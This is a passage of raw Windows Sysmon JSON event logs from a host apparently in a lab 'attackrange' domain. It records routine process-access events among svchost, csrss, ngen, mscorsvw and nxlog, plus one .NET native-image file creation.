07:02:26.513","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1382-5F25-0000-0010D0D50F00}","TargetProcessId":"4760","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8606,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:26.623\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1382-5F25-0000-001019D90F00}\r\nTargetProcessId: 4736\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:26.623","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1382-5F25-0000-001019D90F00}","TargetProcessId":"4736","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8607,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:26.623\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1382-5F25-0000-001019D90F00}\r\nTargetProcessId: 4736\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:26.623","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1382-5F25-0000-001019D90F00}","TargetProcessId":"4736","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8608,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:26.638\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1382-5F25-0000-001019D90F00}\r\nTargetProcessId: 4736\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:26.638","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1382-5F25-0000-001019D90F00}","TargetProcessId":"4736","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8609,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:27.170\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:27.170","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8610,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:27.841\r\nProcessGuid: {E2A3D6B1-1382-5F25-0000-001019D90F00}\r\nProcessId: 4736\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1280-0\\System.Speech.dll\r\nCreationUtcTime: 2020-08-01 07:02:27.841","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:27.841","ProcessGuid":"{E2A3D6B1-1382-5F25-0000-001019D90F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1280-0\\System.Speech.dll","CreationUtcTime":"2020-08-01 07:02:27.841","EventReceivedTime":"2020-08-01 07:02:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8611,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:27.904\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1383-5F25-0000-0010F9DC0F00}\r\nTargetProcessId: 3280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:27.904","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1383-5F25-0000-0010F9DC0F00}","TargetProcessId":"3280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8612,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:27.904\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1383-5F25-0000-0010F9DC0F00}\r\nTargetProcessId: 3280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:27.904","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1383-5F25-0000-0010F9DC0F00}","TargetProcessId":"3280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8613,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:27.904\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1383-5F25-0000-0010F9DC0F00}\r\nTargetProcessId: 3280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:27.904","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1383-5F25-0000-0010F9DC0F00}","TargetProcessId":"3280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
